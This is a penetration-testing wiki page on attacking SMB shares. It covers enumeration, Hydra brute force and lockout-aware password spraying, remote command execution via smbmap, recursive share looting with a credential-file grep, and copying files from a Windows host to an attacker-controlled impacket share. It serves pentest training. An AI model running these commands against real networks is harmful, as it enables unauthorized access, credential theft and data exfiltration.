SMB: Difference between revisions

From RCATs
Revision as of 17:19, 21 January 2023

Description

SMB stands for Server Message Block. It is the file, printer and named-pipe sharing protocol spoken by Windows and by Samba. Default ports are TCP 445 (SMB directly over TCP) and TCP 139 (SMB over the NetBIOS session service).

What does it do? It lets clients, such as workstations, talk to a server that exposes shared directories (as well as printers and RPC pipes), which is why it is one of the first services worth enumerating on a Windows network.

Enumeration

Nmap

Automatic enumeration can be done with Nmap like so. The port is usually 445 but may differ, and of course the IP will be different. Quote the wildcard script names so the shell does not try to expand them as file globs.

# Guesses SMB credentials. Every failed guess counts against the account lockout threshold, so check the password policy first (enum4linux reports it).
nmap --script smb-brute -p 445 <target-ip>

# Lists shares and users, as a null session by default or authenticated via --script-args smbusername=...,smbpassword=...
nmap --script smb-enum-shares.nse,smb-enum-users.nse -p 445 <target-ip>

# All smb-enum-* scripts: shares, users, groups, sessions, domains, services.
nmap --script "smb-enum*" -p 445 <target-ip>

# Which SMB dialects the server accepts. SMBv1 still being enabled is a finding on its own.
nmap --script smb-protocols -p 445 <target-ip>

# Known-vulnerability checks (MS17-010 and friends). Some of these scripts can crash a fragile target, so read each script's description before running them against production hosts.
nmap --script "smb-vuln*" -p 445 <target-ip>

Enum4Linux

Enum4Linux enumerates the users, share directories, groups, password policy, etc. over SMB and MSRPC.

enum4linux <target-ip>    # Basic use (null session).

enum4linux -a <target-ip>    # All simple enumeration: users, shares, groups, password policy, OS info.

enum4linux -v <target-ip>    # Verbose; shows the underlying rpcclient, smbclient and net commands it runs.

# Specify a username and password. Authenticated enumeration usually returns far more than a null session, because modern Windows restricts anonymous listing of users and shares.
enum4linux -u username -p password <target-ip>

SMB Map

smbmap -H <target-ip>    # List shares and our permissions on each (null session).

smbmap -H <target-ip> -R    # Recursive directory listing of every share we can read.

# Username and password
smbmap -u username -p password -H <target-ip>

# Execute a command on the target. This needs an account with administrative rights on the host (write access to ADMIN$), not just a share user.
smbmap -u username -p password -H <target-ip> -x 'ipconfig'
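Added example (shell), not code from the original page: a small parser that turns the share table smbmap prints into a list of readable and writable shares, so the next step (smbclient against each share) can be scripted rather than read off the screen. The smbmap output in SMBMAP_SAMPLE is constructed for the demo, and 10.0.0.1 and the share names are placeholders; the parser keys on smbmap's permission keywords (NO ACCESS, READ ONLY, READ, WRITE, WRITE ONLY) rather than on column positions, so it tolerates the tab or space padding of real output.

```shell
#!/bin/sh
# Added example, not code from the original page: parse the share table
# that `smbmap -H <target-ip>` prints into "share<TAB>PERM" lines so the
# readable and writable shares can be fed to the next tool.
# SMBMAP_SAMPLE is CONSTRUCTED to mimic smbmap output (10.0.0.1 and the
# share names are placeholders); real output is tab separated, but the
# parser keys on the permission keywords, not on column positions.

SMBMAP_SAMPLE='[+] IP: 10.0.0.1:445    Name: 10.0.0.1
        Disk                         Permissions    Comment
        ----                         -----------    -------
        ADMIN$                       NO ACCESS      Remote Admin
        C$                           NO ACCESS      Default share
        IPC$                         READ ONLY      Remote IPC
        Public Docs                  READ ONLY      Staff handbooks
        Scripts                      READ, WRITE    Logon scripts
        Backups                      READ, WRITE'

# stdin: smbmap output. stdout: one "share<TAB>PERM" line per share,
# PERM in NONE / READ / WRITE / READ+WRITE.
smb_shares_parse() {
    awk '
        match($0, /NO ACCESS|READ ONLY|READ, WRITE|WRITE ONLY/) {
            share = substr($0, 1, RSTART - 1)
            kw    = substr($0, RSTART, RLENGTH)
            gsub(/^[ \t]+|[ \t]+$/, "", share)   # trim, keep inner spaces
            perm = "NONE"
            if (kw == "READ ONLY")   perm = "READ"
            if (kw == "WRITE ONLY")  perm = "WRITE"
            if (kw == "READ, WRITE") perm = "READ+WRITE"
            print share "\t" perm
        }'
}

# Shares we can write to: where an uploaded file (put) will be accepted.
smb_writable_shares() {
    smb_shares_parse | awk -F '\t' '$2 ~ /WRITE/ { print $1 }'
}

# Shares we can read from, skipping IPC$ (named pipes, nothing to download).
smb_readable_shares() {
    smb_shares_parse | awk -F '\t' '$2 ~ /READ/ && $1 != "IPC$" { print $1 }'
}

# Stand-alone demo on the constructed sample. With a live target:
#   smbmap -H <target-ip> | smb_writable_shares
printf '%s\n' "$SMBMAP_SAMPLE" | smb_shares_parse
```

Pipe real smbmap output into smb_writable_shares or smb_readable_shares; the functions only read stdin, so they work equally on a saved scan file.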

SMBClient

Connect with smbclient

smbclient -L 10.0.0.1    # List shares; prompts for a password.

smbclient -N -L 10.0.0.1    # Same, with no password (null session).

smbclient -N -L \\\\10.0.0.1    # Windows-style host syntax; the backslashes are doubled for the shell.

smbclient -L 10.0.0.1 -U username    # List shares as a specific user (-U also accepts username%password).

smbclient //10.0.0.1/somedir -N    # Connect to the share somedir anonymously.

# Share names containing spaces need quoting.
smbclient "//10.0.0.1/some dir" -N

# Connect to a specific share as a user.
smbclient //10.0.0.1/somedir -U username

# Specify the workgroup or domain.
smbclient -L 10.0.0.1 -W WORKGROUP -U username

Brute Force

Brute Force Credentials

Hydra

hydra -l username -P passwords.txt <target-ip> smb    # One user, many passwords: brute force.

hydra -L usernames.txt -p password <target-ip> smb    # Many users, one password: a password spray.

Before running either, check the domain's account lockout threshold (enum4linux reports it in the password policy). Brute forcing a single account past the threshold locks it out, which is noisy and harms the client; spraying one password across many users per lockout window stays under it.
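Added example (shell), not part of the original page: the lockout check a tester should do before pointing hydra at SMB. It parses the password-policy block that enum4linux prints (POLICY_SAMPLE and NOLOCK_SAMPLE are constructed in that format; label wording can differ between enum4linux versions, so adjust the sed patterns if yours does) and turns the Account Lockout Threshold and Reset Account Lockout Counter into a plan: brute force freely when no lockout is configured, otherwise spray at most threshold minus one passwords per user per reset window.

```shell
#!/bin/sh
# Added example, not code from the original page: derive a safe guessing
# budget from the domain password policy before running hydra against SMB.
# Both samples below are CONSTRUCTED in the layout enum4linux prints for
# its password-policy section (label names may differ between versions).

POLICY_SAMPLE='[+] Password Info for Domain: CORP
    [+] Minimum password length: 7
    [+] Password history length: 24
    [+] Maximum password age: 41 days 23 hours 53 minutes
    [+] Password Complexity Flags: 000001
    [+] Minimum password age: 1 day 4 minutes
    [+] Reset Account Lockout Counter: 30 minutes
    [+] Locked Account Duration: 30 minutes
    [+] Account Lockout Threshold: 5
    [+] Forced Log off Time: Not Set'

NOLOCK_SAMPLE='[+] Password Info for Domain: LAB
    [+] Minimum password length: 0
    [+] Reset Account Lockout Counter: None
    [+] Locked Account Duration: None
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: Not Set'

# First word after "<label>:" in the policy text on stdin (e.g. "5", "30", "None").
policy_field() {
    sed -n "s/.*$1: *\([^ ]*\).*/\1/p" | head -n 1
}

# Lockout threshold as an integer; 0 means no lockout is configured.
lockout_threshold() {
    t=$(policy_field "Account Lockout Threshold")
    case "$t" in
        ''|None|none) echo 0 ;;
        *) echo "$t" ;;
    esac
}

# Print "MODE ATTEMPTS WINDOW": brute force with no limit when there is no
# lockout, otherwise spray at most threshold-1 passwords per account per
# reset window (minutes). One guess of headroom is left for the users' own
# failed logins; use threshold-2 if other testers share the target.
spray_plan() {
    policy=$(cat)
    th=$(printf '%s\n' "$policy" | lockout_threshold)
    if [ "$th" -eq 0 ]; then
        echo "brute unlimited 0"
        return 0
    fi
    win=$(printf '%s\n' "$policy" | policy_field "Reset Account Lockout Counter")
    if [ "$th" -gt 1 ]; then n=$((th - 1)); else n=0; fi
    echo "spray $n ${win:-unknown}"
}

# Stand-alone demo; feed real output with:  enum4linux -P <target-ip> | spray_plan
printf '%s\n' "$POLICY_SAMPLE" | spray_plan
printf '%s\n' "$NOLOCK_SAMPLE" | spray_plan
```

With the "spray 4 30" answer for the first sample, the matching hydra shape is the second form on this page (-L usernames.txt -p password), run with at most four different passwords per 30-minute window; with "brute unlimited 0" the -l user -P wordlist form is safe from lockouts, though still noisy in the logs.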

Basic Commands

Once connected, look for sensitive files and information: configuration files, scripts with embedded credentials, backups, and anything a user should not have left on a share.

# List files
smb: \> ls

# Download a file
smb: \> get sample.txt

# Upload a file; it can be txt, pdf, php, etc. (only works if the share is writable)
smb: \> put sample.txt

# Download the whole share recursively: empty mask, recurse into directories, no per-file prompts
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

# We can use smbget from our local machine as well (recursive download of a share)
smbget -R smb://<target-ip>/somedir -U username

# Specify the workgroup
smbget -R smb://<target-ip>/somedir -w WORKGROUP -U username

# As the anonymous user; when prompted, give the password anonymous
smbget smb://<target-ip>/somedir -U anonymous
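Added example (shell), not from the original page: the mask/recurse/prompt/mget sequence above driven non-interactively through smbclient's -c option, followed by a first-pass triage of the downloaded tree for the files worth opening first. The interface is assumed, not taken from the page: share URL, destination directory and username are arguments (user%password is accepted by -U but puts the password in the process list), and DRY_RUN=1 prints the smbclient command instead of running it. The file-name and password patterns in triage_loot are a starting list, not an exhaustive one.

```shell
#!/bin/sh
# Added example, not code from the original page. mirror_share runs the
# interactive mask/recurse/prompt/mget sequence non-interactively via
# smbclient -c; triage_loot then lists the downloaded files worth opening
# first. Assumed interface: $1 = //host/share, $2 = local destination dir,
# $3 = username (empty for a null session; user%password also works but
# exposes the password in the process list). DRY_RUN=1 prints the command.

mirror_share() {
    share=$1; dest=$2; user=$3
    if [ -n "$user" ]; then auth="-U $user"; else auth="-N"; fi
    # Same commands as typed at the smb: \> prompt, joined with semicolons.
    batch='mask ""; recurse ON; prompt OFF; mget *'
    if [ "${DRY_RUN:-0}" = 1 ]; then
        printf "smbclient %s %s -c '%s'\n" "$share" "$auth" "$batch"
        return 0
    fi
    # Subshell so the cd does not leak into the caller; files land under $dest.
    ( mkdir -p "$dest" && cd "$dest" && smbclient "$share" $auth -c "$batch" )
}

# Files that usually hold credentials, by name, plus any text file containing
# a "password=" / "pwd:" style assignment. Extend both lists to taste.
triage_loot() {
    dir=$1
    {
        find "$dir" -type f \( -iname '*.kdbx' -o -iname 'web.config' \
            -o -iname 'unattend.xml' -o -iname 'Groups.xml' -o -iname 'id_rsa' \
            -o -iname '*.ps1' -o -iname '*.bat' -o -iname '*.vbs' \
            -o -iname '*.config' -o -iname '*.ini' \) -print
        grep -rilE '(password|passwd|pwd)[[:space:]]*[=:]' "$dir" 2>/dev/null || true
    } | sort -u
}

# Typical run against a live target (not executed by the offline test):
#   mirror_share //10.0.0.1/Public ./loot/Public '' && triage_loot ./loot/Public
```

The dry run is worth keeping even outside testing: it shows exactly which share and credentials are about to be pulled, which matters when the engagement scope lists only some shares on a host.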

# Transfer a file from Windows to the attacker machine over SMB.
# On the local Kali box, make a directory for the file and move into it, so that $(pwd) below points at it rather than at whatever directory you happened to be in.
mkdir smb && cd smb

# Next, run impacket-smbserver to expose that directory as a share named "share".
sudo impacket-smbserver -smb2support share $(pwd)

# Then, from a cmd.exe prompt on the Windows host, copy the file to the share (inside PowerShell itself, run copy or Copy-Item directly).
powershell copy bloodhound.zip \\attackip\share\

# A BloodHound collector zip is used here because it is the usual thing to pull back when enumerating Active Directory. Recent Windows builds block unauthenticated guest access to SMB shares by default; if the copy is refused, start impacket-smbserver with -username and -password and authenticate from Windows (for example with net use) before copying.